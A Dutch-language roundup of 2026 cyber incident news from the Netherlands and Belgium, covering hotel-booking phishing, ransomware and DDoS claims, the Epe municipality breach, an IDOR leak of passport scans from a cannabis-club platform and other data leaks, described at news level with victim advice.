Cyberaanvallen 2026 in Nederland en België

Staatssecretaris Van Bruggen van Justitie en Veiligheid heeft de Tweede Kamer geïnformeerd over een potentieel datalek in de Penitentiaire Inrichting (PI) Vught. Het incident betreft een laptop die aan een gedetineerde werd uitgegeven, waarop mogelijk gegevens van een andere gevangene stonden.

Gedetineerden in de PI Vught krijgen toegang tot speciale DSJ laptops om hun eigen strafdossiers digitaal in te zien. Deze laptops zijn strikt geïsoleerd; ze beschikken niet over een internetverbinding of andere faciliteiten en zijn uitsluitend bedoeld voor het raadplegen van het eigen statische strafdossier.

Onlangs meldde een gevangene van de PI Vught dat de DSJ laptop die hij had ontvangen, gegevens van een andere gedetineerde bevatte. De reguliere procedure schrijft voor dat een DSJ laptop na gebruik volledig wordt uitgeschakeld. Dit uitschakelen zorgt ervoor dat alle historie automatisch wordt verwijderd en de machine 'geschoond' wordt, voordat deze aan een volgende gedetineerde mag worden uitgegeven.

De melding van de gedetineerde doet vermoeden dat deze essentiële procedure mogelijk niet is gevolgd. Een dergelijke overtreding zou betekenen dat een gedetineerde inzage heeft gehad in gevoelige informatie van een andere gedetineerde. De staatssecretaris heeft de Tweede Kamer geïnformeerd vanwege de risicostatus van beide gedetineerden, waarbij één van hen momenteel verblijft in de Extra Beveiligde Inrichting (EBI).

Om de exacte toedracht vast te stellen en te bepalen of de werkprocedure inderdaad niet is opgevolgd, is een onderzoek gestart. Mocht uit dit onderzoek blijken dat de betreffende gedetineerde daadwerkelijk inzage heeft gehad in gegevens van een andere gedetineerde, dan zal dit als een datalek worden gemeld bij de Autoriteit Persoonsgegevens.

Bron: Tweede Kamer

Koninklijke Horeca Nederland (KHN) heeft een waarschuwing afgegeven aan hotels in Nederland over een omvangrijk datalek. Volgens de brancheorganisatie hebben gasten van hotels phishingberichten ontvangen als gevolg van dit incident. Hackers zijn erin geslaagd om binnen te dringen in de boekingssystemen van diverse hotels, waarbij gegevens van gasten zijn buitgemaakt.

KHN heeft naar aanleiding van het datalek talloze meldingen ontvangen van slachtoffers die de verdachte phishingberichten hebben ontvangen. De organisatie benadrukt de ernst van de situatie en roept hotels op alert te zijn en passende maatregelen te nemen. Details over de specifieke hotels of de omvang van het datalek zijn niet bekendgemaakt, maar de waarschuwing duidt op een breed probleem dat de Nederlandse hotelsector treft. Het is cruciaal dat hotels hun beveiligingsmaatregelen van boekingssystemen controleren en gasten informeren over mogelijke risico's.

Bron: Koninklijke Horeca Nederland (KHN)

De dreigingsactor Elite Squad heeft geclaimd DDoS aanvallen te hebben uitgevoerd op meerdere websites van Nederlandse universiteiten. Deze beweringen werden ontdekt door Cybercrimeinfo. De acties van Elite Squad zijn specifiek gericht op instellingen in Nederland.

Volgens de claims van de groep zijn de volgende Nederlandse universiteiten het doelwit geweest van de DDoS aanvallen:

*   Universiteit van Amsterdam

*   Erasmus Universiteit Rotterdam

*   Universiteit Leiden

*   Rijksuniversiteit Groningen

*   Universiteit Utrecht

*   Maastricht University

*   Amsterdam University College

Een Distributed Denial of Service (DDoS)-aanval heeft als doel een online dienst ontoegankelijk te maken door deze te overspoelen met een grote hoeveelheid verkeer, waardoor de servers overbelast raken en legitieme gebruikers geen toegang meer krijgen. De claim van Elite Squad omvat een reeks prominente Nederlandse academische instellingen. De alert vermeldt niet of deze aanvallen succesvol waren of wat de huidige operationele status van de websites van de getroffen universiteiten is.

Bron: Darkweb

Cybercrimeinfo ontdekte dat Katholiek Amersfoort, een religieuze instelling gevestigd in Nederland, het vermeende slachtoffer is geworden van de STORMOUS ransomwaregroep. De aanvallers beweren verantwoordelijk te zijn voor een cyberaanval en dreigen de gestolen data op het darkweb te publiceren.

Katholiek Amersfoort, bekend van haar website katholiekamersfoort.nl, is hiermee het meest recente Nederlandse doelwit dat in verband wordt gebracht met ransomware-activiteiten. De claim van de STORMOUS-groep duidt op een mogelijke datadiefstal, wat ernstige gevolgen kan hebben voor de privacy van betrokkenen en de operationele continuïteit van de instelling. Het publiceren van data op het darkweb is een veelgebruikte tactiek van ransomwaregroepen om druk uit te oefenen op slachtoffers om losgeld te betalen.

De melding van deze aanval benadrukt de aanhoudende dreiging van ransomware voor organisaties van elke omvang en sector, inclusief religieuze instellingen. Het is cruciaal voor alle entiteiten om robuuste cybersecuritymaatregelen te implementeren en incidentresponsplannen paraat te hebben om dergelijke aanvallen te mitigeren en de impact ervan te beperken.

Bron: Darkweb

Cybercrimeinfo heeft een melding ontvangen over vermeende DDoS aanvallen gericht op Nederlandse entiteiten. De dreigingsactor, bekend onder de naam NoName, claimt verantwoordelijk te zijn voor deze aanvallen. Specifieke doelwitten die door NoName zijn genoemd, betreffen VDL Bus & Coach en VDL Group.

Deze aanvallen zouden gericht zijn op meerdere websites binnen Nederland. DDoS aanvallen (Distributed Denial of Service) zijn methodes waarbij aanvallers proberen om online diensten en websites onbereikbaar te maken. Dit doen zij door de servers te overspoelen met een overweldigende hoeveelheid netwerkverkeer, afkomstig van een groot aantal gecompromitteerde computers of apparaten. Het gevolg hiervan is dat legitieme gebruikers geen toegang meer kunnen krijgen tot de getroffen diensten, wat kan leiden tot operationele verstoringen en financiële schade voor de getroffen organisaties.

De claims van NoName zijn op dit moment niet onafhankelijk bevestigd door de getroffen partijen of externe monitoringdiensten. De exacte aard en omvang van de vermeende aanvallen, evenals de eventuele impact op de operationele continuïteit van VDL Bus & Coach en VDL Group, zijn momenteel onduidelijk. Cybercrimeinfo blijft de situatie nauwlettend volgen voor verdere ontwikkelingen en officiële bevestigingen van de claims.

Bron: Darkweb

Er circuleren momenteel phishingberichten die misbruik maken van de naam van de Christelijke Mutualiteit in België. Deze e-mails verzoeken ontvangers om bepaalde accountgegevens te bevestigen voor een zogenaamde "administratieve controle". Dit betreft een poging tot oplichting, waarbij cybercriminelen proberen persoonlijke gegevens van de slachtoffers te bemachtigen.

Safeonweb.be waarschuwt dat dergelijke frauduleuze berichten vaak te herkennen zijn aan specifieke kenmerken. Zo wordt de ontvanger gevraagd op een link te klikken om gegevens te "bevestigen" of "aan te vullen". Deze link leidt vervolgens naar een valse website die de officiële website van de Christelijke Mutualiteit nabootst. Een ander kenmerk is het e-mailadres van de afzender, dat er vaak vreemd uitziet of kleine afwijkingen bevat, zoals overbodige letters, spelfouten of ongebruikelijke tekens. Hoewel de weergegeven afzendernaam legitiem kan lijken, is het raadzaam om op de naam te klikken of tikken om het volledige e-mailadres te controleren.

Om niet in de val te trappen, adviseert Safeonweb.be om niet op links in dergelijke verdachte e-mails te klikken, geen bijlagen te openen en geen applicaties te downloaden die in het bericht worden gevraagd. Ontvangers van deze phishingberichten wordt dringend geadviseerd de verdachte e-mail door te sturen naar verdacht@safeonweb.be.

Indien men onverhoopt toch op een link heeft geklikt, is het cruciaal om geen gegevens in te vullen en de pagina onmiddellijk te sluiten. Er mogen nooit persoonlijke codes worden doorgegeven. Als een wachtwoord is ingevoerd dat ook elders wordt gebruikt, dient dit wachtwoord onmiddellijk te worden gewijzigd. Wanneer er geld verloren is gegaan door de oplichting, is het van belang snel actie te ondernemen en het advies op de website van Safeonweb.be te volgen.

Bron: Safeonweb

Een datalek dat zowel Nederlandse als Belgische hotels raakt, heeft geleid tot aanzienlijke financiële verliezen voor tal van hotelgasten. Volgens berichtgeving van Het Laatste Nieuws (HLN) zijn slachtoffers in sommige gevallen duizenden euro's kwijtgeraakt door gerichte phishingaanvallen die volgden op het datalek. Eerder werd al bekend dat zeker honderd Nederlandse hotels getroffen zijn.

De aanvallers slaagden erin om op nog onbekende wijze reserveringsgegevens te stelen van een onbekend aantal hotels en hun gasten. Deze gestolen informatie werd vervolgens ingezet voor gerichte phishingcampagnes, waarbij slachtoffers onder andere via WhatsApp werden benaderd. In de phishingberichten werd beweerd dat de ontvanger nog een openstaand bedrag moest voldoen. Er werd gedreigd met de onherroepelijke annulering van de hotelreservering indien de betaling niet binnen een gestelde termijn zou plaatsvinden.

Colin Dearman, manager van hotel Astoria in De Haan, België, heeft tegenover HLN bevestigd dat sommige gasten op deze wijze voor duizenden euro's zijn opgelicht. De omvang van het verlies varieerde afhankelijk van de duur van het geplande verblijf. Opvallend is dat mensen die hun reservering telefonisch bij de hotels hadden gemaakt, geen doelwit zijn geworden van deze phishingaanvallen.

Volgens hoteliers lijkt de "gemene deler" van alle getroffen hotels het online reserveringssysteem te zijn waarmee zij werken. Dit systeem is ontwikkeld door het Gentse softwarebedrijf Lighthouse. De software koppelt hoteladministraties aan diverse online boekingssites, waaronder Booking.com, en verzamelt centraal alle reserveringen en klantgegevens. Het Laatste Nieuws suggereert dat Lighthouse mogelijk gehackt is. Echter, in een reactie heeft Lighthouse aangegeven dat er nog geen aanwijzingen zijn gevonden voor ongeautoriseerde toegang tot hun systemen.

Bron: Het Laatste Nieuws

De Nederlandse politie heeft recentelijk via haar Instagram-kanaal een urgente waarschuwing uitgegeven betreffende frauduleuze berichten die op bedrieglijke wijze de indruk wekken afkomstig te zijn van de Rabobank. Deze zorgwekkende berichten worden actief verspreid door cybercriminelen en zijn specifiek ontworpen om ontvangers te misleiden. In de valse communicatie wordt de ontvanger geïnformeerd dat de daglimiet van hun bankrekening succesvol is verhoogd naar een aanzienlijk bedrag van 54.000 euro. Het doel van deze mededeling is om onrust te zaaien en een gevoel van urgentie te creëren, waardoor slachtoffers sneller geneigd zijn tot actie over te gaan.

De afzenders van deze geraffineerde nepberichten instrueren de ontvanger om onmiddellijk contact op te nemen met een specifiek, in het bericht vermeld, telefoonnummer. Dit contact is vereist als de ontvanger deze substantiële limietverhoging niet zelf heeft aangevraagd. Deze tactiek is een klassiek voorbeeld van bankhelpdeskfraude, een veelvoorkomende vorm van cybercriminaliteit waarbij oplichters zich voordoen als bankmedewerkers om het vertrouwen van slachtoffers te winnen.

Zodra een argeloze ontvanger het in het nepbericht opgegeven telefoonnummer belt, komen zij in contact met de cybercriminelen. Deze criminelen proberen vervolgens via uitgekiende social engineering technieken toegang te verkrijgen tot de bankrekening van het slachtoffer. Dit kan op verschillende manieren gebeuren: door het ontfutselen van inloggegevens, het overtuigen van het slachtoffer om persoonlijke bankgegevens te delen, of zelfs door het slachtoffer te manipuleren om zelfstandig een geldbedrag over te maken naar een bankrekening die onder controle staat van de fraudeurs. De valse melding van een verhoogde daglimiet van 54.000 euro dient hierbij als een krachtig lokmiddel om angst en paniek te zaaien, waardoor slachtoffers minder kritisch worden en sneller geneigd zijn tot actie over te gaan.

De politie benadrukt met klem het belang van waakzaamheid bij het ontvangen van dergelijke ongevraagde en verdachte berichten. Het dringende advies aan alle burgers is om het telefoonnummer dat in het frauduleuze bericht wordt vermeld, onder geen enkele omstandigheid te bellen. Bij enige twijfel over de authenticiteit van een bericht van een bank, is het cruciaal om altijd zelfstandig en proactief contact op te nemen met de betreffende financiële instelling. Dit dient uitsluitend te gebeuren via de officiële en geverifieerde communicatiekanalen van de bank, zoals de officiële website of de mobiele applicatie. Deze kanalen bieden de enige betrouwbare en veilige manier om de geldigheid van dergelijke berichten te controleren en zo te voorkomen dat men slachtoffer wordt van geavanceerde fraude.

Bron: Politie

De gemeente Epe is het slachtoffer geworden van een cyberaanval waarbij een aanvaller het wachtwoord van een beheerder kraakte en toegang verkreeg tot een noodaccount. Als gevolg hiervan is 871 gigabyte aan data buitgemaakt, waaronder een export uit de Basisregistratie Personen (BRP) met gevoelige persoonsgegevens van inwoners. Dit blijkt uit een interne evaluatie van het datalek, zoals door de gemeente gepubliceerd.

De aanval begon op 10 maart dit jaar, toen een aanvaller via een zogeheten ClickFix-aanval toegang wist te verkrijgen tot het systeem van een gemeentemedewerker. Bij een aanval van het type ClickFix worden slachtoffers misleid om specifieke commando's op hun computer uit te voeren. Dit gebeurt vaak door middel van malafide CAPTCHA-pagina's die een schadelijk PowerShell commando naar het klembord kopiëren, waarna de gebruiker wordt geïnstrueerd dit commando uit te voeren in het Uitvoervenster of de Windows Terminal.

Nadat de aanvaller voet aan de grond had gekregen op het systeem van de medewerker, werd gezocht naar andere ingelogde gebruikers. Door een kerberosticket van een ingelogde beheerder te ontsleutelen, lukte het de aanvaller om het bijbehorende wachtwoord te kraken en zo toegang te krijgen via diens ticket. Vervolgens werd ook toegang verkregen tot een noodaccount, dat over uitgebreide toegangsrechten op het systeem beschikte. De gemeente stelt dat dit noodaccount, dat als een 'loper' kan worden gezien, in de regel geen meervoudige authenticatie (MFA) heeft omdat het bedoeld is voor noodtoegang. Echter, er waren onvoldoende aanvullende beveiligingsmaatregelen getroffen voor dit account, waardoor de aanvaller vergaande rechten kon verkrijgen.

Met de verworven toegang kopieerde de aanvaller met behulp van het programma AzCopy circa 871 gigabyte aan data, verspreid over ruim 550.000 bestanden, naar een externe cloudopslag, een Azure Blob Storage. De gestolen data was afkomstig van een interne bestandsserver die op korte termijn zou worden uitgefaseerd, in verband met een geplande migratie naar SharePoint en Microsoft Teams.

De buitgemaakte gegevens omvatten een export uit de BRP met persoonsgegevens van inwoners, zoals naam, adres, geslacht, woonplaats, geboortedatum en Burgerservicenummer (BSN). Daarnaast werden persoonsgegevens van medewerkers gestolen, waaronder namen, e-mailadressen, zakelijke telefoonnummers, datum indiensttreding en profielfoto's. Ook financiële gegevens van de gemeente en haar relaties, aanvragen voor gemeentelijke voorzieningen, meldingen van overlast of verstoring van de openbare orde, en kopieën van ongeveer duizend identiteitsbewijzen behoorden tot de gestolen informatie. De gemeente Epe heeft bevestigd dat de gestolen gegevens op het moment van schrijven niet zijn gepubliceerd op bekende leksites of marktplaatsen, dat er geen losgeld is geëist en dat er geen indicaties zijn van misbruik van de data.

Naar aanleiding van het incident heeft de gemeente verschillende lessen getrokken. De aanval begon met social engineering, wat benadrukt dat technische maatregelen alleen niet volstaan en medewerkers getraind moeten worden om verdachte situaties te herkennen en te melden. Het bewustwordingsprogramma voor medewerkers zal worden vernieuwd. Verder zijn werkprocessen aangepast om de opslag van gevoelige gegevens, zoals data-exports en kopieën van identiteitsbewijzen, te voorkomen. Ook is het gebruik van PowerShell en het Run-venster voor standaardgebruikers beperkt en is de netwerksegmentatie aangescherpt.

Bron: Gemeente Epe | Bron 2: radar.avrotros.nl | Bron 3: rijksoverheid.nl

De criminele groepering ShinyHunters claimt een datalek te hebben veroorzaakt bij het Nederlandse zakenreisbureau BCD Travel. De gestolen data zou gegevens van 396.000 accounts omvatten. Dit nieuws is bevestigd door beveiligingsonderzoeker Troy Hunt, oprichter van de datalekzoekmachine Have I Been Pwned, die de 396.000 e-mailadressen van de betrokken accounts aan zijn website heeft toegevoegd. Op de officiële website van BCD Travel is momenteel geen informatie over het mogelijke datalek te vinden.

Eerder liet BCD Travel aan het FD weten dat het recentelijk verdachte activiteit had waargenomen via een intern gebruikt account. Na deze ontdekking is direct een onderzoek gestart om de aard en omvang van de activiteiten vast te stellen, welk onderzoek nog gaande is. ShinyHunters maakte eind vorige maand bekend de systemen van BCD Travel te hebben gehackt en stelde een ultimatum voor losgeld, met een deadline van 1 juni. Toen deze deadline verstreek, publiceerden de cybercriminelen eerder deze week een dataset van dertig gigabyte, die afkomstig zou zijn van BCD Travel. De groep beweert in totaal de gegevens van meer dan 700.000 accounts te hebben buitgemaakt.

De dataset bevat, naast andere informatie, de 396.000 e-mailadressen die nu zijn opgenomen in de database van Have I Been Pwned. Deze website stelt gebruikers in staat te controleren of hun e-mailadres is betrokken bij bekende datalekken. Opvallend is dat slechts 28 procent van de e-mailadressen die nu bij BCD Travel zouden zijn gestolen, al bekend was via een eerder datalek bij Have I Been Pwned. Dit percentage is aanzienlijk lager dan bij veel andere datalekken, waar een groter deel van de gelekte adressen al eerder in omloop bleek te zijn.

Bron: Have I Been Pwned

Een alleenstaande moeder uit Aarschot, de 45-jarige Ellie Dewinter, is al haar spaargeld kwijtgeraakt door een geraffineerde vorm van online oplichting. Dewinter solliciteerde online voor een flexi-job in het weekend, in de hoop wat extra geld te verdienen. Binnen enkele minuten na haar online sollicitatie was haar rekening leeggeplunderd. Ze verklaarde: "In 5 minuten tijd was ik alles kwijt." Het ging om geld waarvoor ze maandenlang had gespaard.

De internetcriminelen gingen volgens de politie zeer gewiekst te werk. Hoewel de specifieke methoden van de oplichters niet in detail zijn beschreven, waarschuwt de politie voor het belang van voorzichtigheid bij online sollicitaties. Een belangrijke indicator voor potentiële fraude is wanneer er sprake is van haast. "Als er haast bij is, klopt er iets niet," aldus de waarschuwing van de politie, die benadrukt dat dit een veelvoorkomend kenmerk is van dergelijke zwendelpraktijken. Het incident onderstreept de noodzaak voor burgers om alert te zijn op verdachte signalen bij online interacties, vooral wanneer financiële gegevens of snelle beslissingen worden gevraagd.

Bron: HLN.be

Verlopen en opgezegde domeinnamen van bewindvoerders zorgen ervoor dat gevoelige informatie van cliënten in handen van derden kan vallen. Dit werd vandaag gemeld door RTL Nieuws. Bewindvoerders zijn verantwoordelijk voor het regelen van de financiële zaken van personen die dit zelf niet kunnen, zoals mensen met een verstandelijke beperking, overmatig geldgebruik of problematische schulden, zo licht de Rijksoverheid toe.

Een onderzoeker ontdekte in gelekte data van telecombedrijf Odido dat veel mensen het e-mailadres van hun bewindvoerder hadden gebruikt. Volgens het rapport van RTL Nieuws zijn in de afgelopen jaren veel bewindvoerders gefuseerd of overgenomen door andere organisaties. Als gevolg hiervan zijn domeinnamen opgezegd of verlopen. Door deze domeinnamen opnieuw te registreren, was het mogelijk om diverse gevoelige gegevens van cliënten te ontvangen. De onderzoeker kreeg op deze wijze toegang tot 258 financiële dossiers.

Aegis, de branchevereniging voor bewindvoering, heeft aangekondigd haar leden te zullen waarschuwen voor de risico’s van verlopen en opgezegde domeinnamen. De vereniging benadrukt de noodzaak van extra alertheid, gezien de gevoeligheid van de informatie waarover bewindvoerders beschikken en de kwetsbaarheid van veel van hun cliënten. Aegis is van plan leden voor te lichten over deze risico’s en onderzoekt de mogelijkheid om een protocol te ontwikkelen voor dit soort incidenten.

De Stichting Internet Domeinregistratie Nederland (SIDN), de organisatie die de .nl-domeinnamen beheert, bevestigde tegenover RTL Nieuws dat het probleem van datalekken door opgegeven domeinnamen nog steeds actueel is. De onderzoeker die de kwetsbaarheid aan het licht bracht, heeft de meest populaire domeinnamen van bewindvoerders die in het Odido datalek voorkwamen en die nog beschikbaar waren, inmiddels geregistreerd om verder misbruik te voorkomen.

Bron: Rijksoverheid

De gemeente Eindhoven heeft een datalek gemeld bij de Autoriteit Persoonsgegevens (AP) op 23 oktober 2025, nadat medewerkers gevoelige documenten hadden geplakt in openbare AI diensten zoals ChatGPT. Tussen 23 september en 23 oktober 2025 ontdekte de gemeente via een eigen steekproef dat ruim duizend documenten met persoonsgegevens op deze manier waren verwerkt.

Het betrof gevoelige informatie van kwetsbare inwoners, waaronder dossiers in het kader van de Jeugdwet, reflectieverslagen, cv's en gegevens over jeugdproblematiek en mentale gezondheid. Het datalek ontstond doordat de medewerkers vertrouwelijke bestanden plakten in de gratis, openbare versies van AI modellen. Bij dergelijke diensten kan ingevoerde data als trainingsdata worden gebruikt en potentieel elders opduiken.

Na de ontdekking en melding bij de AP blokkeerde de gemeente Eindhoven onmiddellijk alle openbare AI websites voor haar medewerkers. Sindsdien is het personeel alleen nog toegestaan om Microsoft Copilot te gebruiken binnen de beveiligde gemeentelijke omgeving. Dit incident werd door NOS Nieuwsuur naar buiten gebracht als een waarschuwing voor andere organisaties die hun personeel met AI laten werken.

Bron: Gemeente Eindhoven

Bijna honderd Vlaamse hotels zijn de afgelopen week getroffen door een geavanceerde phishingaanval. Hotelgasten ontvangen daarbij verdachte berichten via WhatsApp of andere communicatiekanalen. Deze berichten bevatten correcte reserveringsgegevens, zoals de naam van de gast, de boekingsreferentie en de verblijfsdata, wat de phishingcampagne bijzonder geloofwaardig maakt. Na het tonen van deze correcte informatie worden de gasten doorgestuurd naar een valse betaalpagina, met als uiteindelijk doel het stelen van hun betalingsgegevens.

Horeca Vlaanderen heeft de ernst van de situatie benadrukt in een persbericht en heeft de problematiek aangekaart bij minister van Consumentenzaken Rob Beenders (Vooruit). De sectororganisatie ontving meldingen van bijna honderd getroffen hotels, waarvan meer dan een derde aangaf in de afgelopen dagen meer dan 25 klachten van klanten te hebben ontvangen over de verdachte berichten. De impact van deze aanval is aanzienlijk en beïnvloedt de dagelijkse bedrijfsvoering van de hotels. Personeel ervaart aanzienlijk tijdsverlies door het afhandelen van vragen en klachten, wat leidt tot reputatieschade en ontevredenheid bij gasten. Bovendien is de phishingcampagne nog steeds actief.

Horeca Vlaanderen uit grote bezorgdheid over de situatie en de onduidelijkheid die hierdoor ontstaat. Om haar leden te ondersteunen, heeft de organisatie praktische aanbevelingen en richtlijnen verspreid over maatregelen die hotels zelf kunnen nemen om de risico's te beperken. Matthias De Caluwé, CEO van Horeca Vlaanderen, roept hotelgasten op tot extra waakzaamheid bij onverwachte of verdachte communicatie over betalingen of reserveringen. Hij adviseert bij twijfel altijd direct contact op te nemen met het betreffende hotel en dergelijke incidenten te rapporteren.

Minister Beenders heeft aangegeven de signalen "bijzonder ernstig" te nemen. Hij merkt op dat criminelen steeds vaker misbruik maken van het vertrouwen van zowel consumenten als ondernemers. De minister benadrukt het belang van snelle meldingen van mogelijke fraudegevallen en heeft gepaste acties beloofd. Verdachte berichten of pogingen tot oplichting kunnen gemeld worden via het officiële meldpunt van de overheid op safeonweb.be/nl/opgelicht.

Bron: Horeca Vlaanderen | Bron 2: safeonweb.be

Deze dataset zou afkomstig zijn van Appadel, een padelplatform dat geassocieerd wordt met de padelfederatie van Wallonië en Brussel in België. De aanbieder claimt dat de dataset gegevens bevat van ongeveer 10.000 gebruikers.

Volgens de dreigingsactor omvat de gelekte informatie affiliatienummers, officiële namen, voornamen en achternamen, geslacht, leeftijdscategorie, ELO punten en de schorsingsstatus van de spelers. Daarnaast zouden e-mailadressen, datums van accountcreatie en -wijziging, locatiegegevens met breedtegraad en lengtegraad, licentietype en prijs, nationaliteit, de huidige club en URL's naar profielfoto's deel uitmaken van de dataset.

Als bewijs voor de authenticiteit van de claim is een sample van de gegevens gepubliceerd. De volledige download van de dataset is echter alleen beschikbaar na betaling met punten op het darkwebforum. Het is belangrijk te benadrukken dat deze claim niet onafhankelijk is geverifieerd.

Leden van de padelfederatie die gebruikmaken van het platform Appadel doen er goed aan om extra alert te zijn op mogelijke phishingpogingen en worden geadviseerd hun wachtwoorden te wijzigen als voorzorgsmaatregel.

Bron: Cybercrimeinfo

Het Vrouwenrechtencollectief heeft een massaclaim geïnitieerd naar aanleiding van het grootschalige datalek bij laboratorium Clinical Diagnostics in Rijswijk. Dit lek betrof medische gegevens van honderdduizenden vrouwen die deelnamen aan het landelijke bevolkingsonderzoek naar baarmoederhalskanker. Vrouwen die door dit incident zijn getroffen, kunnen zich vanaf heden aanmelden bij het collectief om zich bij de claim aan te sluiten.

De juridische actie van het Vrouwenrechtencollectief richt zich niet alleen op Clinical Diagnostics, maar ook op het ministerie van Volksgezondheid, Welzijn en Sport (VWS). Een primair doel van het collectief is om de gedupeerde vrouwen te ondersteunen bij het verkrijgen van inzage in de gestolen gegevens, zodat zij precies kunnen vaststellen welke informatie van hen in verkeerde handen is gevallen en welke potentiële risico's dit met zich meebrengt.

Eerder onderzoek van de Inspectie Gezondheidszorg en Jeugd (IGJ) wees uit dat het laboratorium de medische gegevens onvoldoende had beveiligd. Clinical Diagnostics bleek niet te voldoen aan de NEN 7510-norm, de Nederlandse norm voor informatiebeveiliging binnen de zorgsector. Bij het datalek, waarvoor de criminele hackergroep Nova de verantwoordelijkheid heeft opgeëist, werden gegevens van minimaal 700.000 vrouwen buitgemaakt.

Dit incident is een van de grootste medische datalekken in de Nederlandse geschiedenis. Eerder waren al twee advocatenkantoren vergelijkbare juridische procedures gestart om hetzelfde datalek.

Bron: Vrouwenrechtencollectief

Een registratieplatform dat wordt gebruikt door cannabisclubs heeft kopieën van bijna één miljoen paspoorten gelekt, naast persoonlijke en medische gegevens van meer dan een miljoen mensen. Onder de getroffen personen bevinden zich zevenduizend mensen uit Nederland en bijna achtduizend uit België. De gelekte informatie was zonder enige vorm van authenticatie voor iedereen op het internet toegankelijk.

Cannabisclubs zijn actief in verschillende landen en vereisen dat leden bij registratie hun naam, adresgegevens, telefoonnummer, e-mailadres, geboortedatum, nationaliteit en een scan van hun paspoort of identiteitsbewijs verstrekken. Ook wordt bijgehouden of het cannabisgebruik voor medicinale doeleinden is, wat als medische informatie kwalificeert.

De kwetsbaarheid werd ontdekt door onderzoeker Sammy Azdoufal. Hij traceerde het lek via de app 'PuffPal', die een QR-code genereert voor snelle toegang tot clubs en ook bestellingen mogelijk maakt. De app leidde de onderzoeker naar een API van de gebruikersprofielen, die een Insecure Direct Object Reference (IDOR) kwetsbaarheid bevatte. IDOR ontstaat wanneer een webapplicatie of API een identifier gebruikt om objecten in een database op te vragen zonder voldoende authenticatie of toegangscontrole, waardoor een gebruiker door het aanpassen van data toegang krijgt tot gegevens van andere gebruikers.

De 'user_id' parameter die door de API werd gebruikt, was een opeenvolgend getal. Er was geen authenticatietoken, sessiecookie of API-sleutel vereist. Hierdoor kon de onderzoeker door simpelweg een getal in de ID te wijzigen, toegang krijgen tot de gegevens van meer dan een miljoen leden. Naast de eerder genoemde registratiegegevens omvatte dit ook het maandelijkse cannabisgebruik en cannabisvoorkeuren.

Azdoufal ontdekte nog een ander significant beveiligingsprobleem in de onderliggende infrastructuur. Tijdens de registratie uploaden clubs foto's van nieuwe leden naar de server, waar de afbeeldingen op een voorspelbare locatie worden opgeslagen. Deze URL was zonder toegangstoken of andere authenticatie voor iedereen op het internet toegankelijk. Volgens Azdoufal was "het meest gevoelige bestand in het hele systeem, het bestand dat bewijst wie je bent, het minst beveiligde bestand". Door dit probleem waren bijna 986.000 paspoortfoto's te downloaden.

De gelekte gegevens bevatten ook informatie over het medicinale cannabisgebruik van meer dan een miljoen leden, wat deze informatie tot gezondheidsgegevens maakt. Deze gegevens vallen onder de extra bescherming van de Algemene Verordening Gegevensbescherming (AVG). Azdoufal meldde de problemen eind april herhaaldelijk aan de betreffende softwareontwikkelaar, maar ontving geen reactie. Na contact met The Verge kwam het bedrijf in actie en meldde op 10 juni dat alle problemen waren verholpen.

Bron: Sammy Azdoufal | Bron 2: github.com

Cybercrimeinfo heeft op het darkweb waargenomen dat de ransomwaregroep LockBit5 claimt het Nederlandse familiebedrijf Van Tuijl (vth.nl) te hebben getroffen. De claim verscheen op 11 juni 2026 op de leksite van de groep. Van Tuijl, gevestigd in Haaften, levert al ruim honderd jaar producten voor de land- en tuinbouw, waaronder potten en trays, en is actief in tientallen landen. Het bedrijf zou daarmee het meest recente Nederlandse doelwit van deze criminele organisatie zijn.

De LockBit5 ransomware groep staat erom bekend dat zij bedrijfsdata stelen en vervolgens versleutelen. Na de succesvolle inbraak wordt losgeld geëist van het getroffen bedrijf in ruil voor het herstellen van de toegang tot de data en het voorkomen van publicatie van de gestolen informatie. Details over de specifieke aard van de gestolen data of de omvang van de aanval zijn op dit moment niet bekendgemaakt. De claim van LockBit5 verscheen op het darkweb, waar de groep doorgaans gestolen data publiceert indien losgeld niet wordt betaald.

De vermeende aanval op Van Tuijl onderstreept de aanhoudende dreiging van ransomware voor Nederlandse bedrijven. Organisaties worden voortdurend geconfronteerd met geavanceerde cybercriminelen die methoden ontwikkelen om systemen te infiltreren en financiële winst te behalen door middel van datadiefstal en encryptie.

Bron: Cybercrimeinfo

Kredietbank Limburg, een gemeentelijke kredietbank die in Nederland diensten levert aan inwoners van onder meer Heerlen, Kerkrade, Landgraaf en Brunssum, is getroffen door een cyberaanval. Vanaf de systemen van de organisatie zijn frauduleuze e-mails verstuurd. Deze berichten probeerden ontvangers te verleiden tot het klikken op links of het delen van persoonlijke gegevens. Naar schatting zijn honderden cliënten mogelijk geraakt door dit incident.

De kredietbank richt zich op het ondersteunen van inwoners met schulden en financiële problemen, een demografische groep die bijzonder kwetsbaar is voor gerichte phishingpogingen. De organisatie heeft ontvangers van deze verdachte e-mails opgeroepen om uiterst alert te zijn. Zij adviseren dringend om niet op verdachte links te klikken en dergelijke berichten onmiddellijk te verwijderen uit hun inbox.

Het onderzoek naar de exacte omvang van de cyberaanval is nog gaande. Belangrijke vragen die nog beantwoord moeten worden, zijn of en welke persoonsgegevens of wachtwoorden zijn buitgemaakt door de aanvallers. Het nieuws over de aanval werd op 11 juni 2026 gemeld door zowel De Limburger als RTV Parkstad.

Bron: Kredietbank Limburg

De gemeente Epe is jarenlang herhaaldelijk gewaarschuwd door haar accountant over tekortkomingen in de beveiliging van haar informatietechnologiesysteem. Ondanks deze waarschuwingen heeft de gemeente onvoldoende maatregelen genomen om de situatie te verbeteren. Deze informatie is recentelijk naar buiten gebracht door regionale media, die zich baseren op eigen onderzoek.

Op 12 maart 2026 werd de gemeente Epe geconfronteerd met een cyberaanval, waarbij een aanzienlijke hoeveelheid bestanden van het computernetwerk werd gestolen. Een forensisch onderzoek, uitgevoerd door het Nederlandse securitybedrijf Eye Security, heeft vastgesteld dat in totaal 551.447 bestanden zijn buitgemaakt. Onder de gestolen documenten bevinden zich ook stukken met gevoelige informatie over inwoners van de gemeente.

Het college van burgemeester en wethouders van Epe heeft inmiddels gereageerd op de bevindingen en erkent dat de waarschuwingen van de accountant inderdaad aanwezig waren. Dit recente nieuws volgt op eerdere berichtgeving over het datalek bij de gemeente Epe, waarover de gemeente zelf eerder al informatie had gepubliceerd. Het incident benadrukt het belang van adequate opvolging van beveiligingsadviezen om de digitale integriteit en privacy van burgergegevens te waarborgen.

Bron: de Stentor

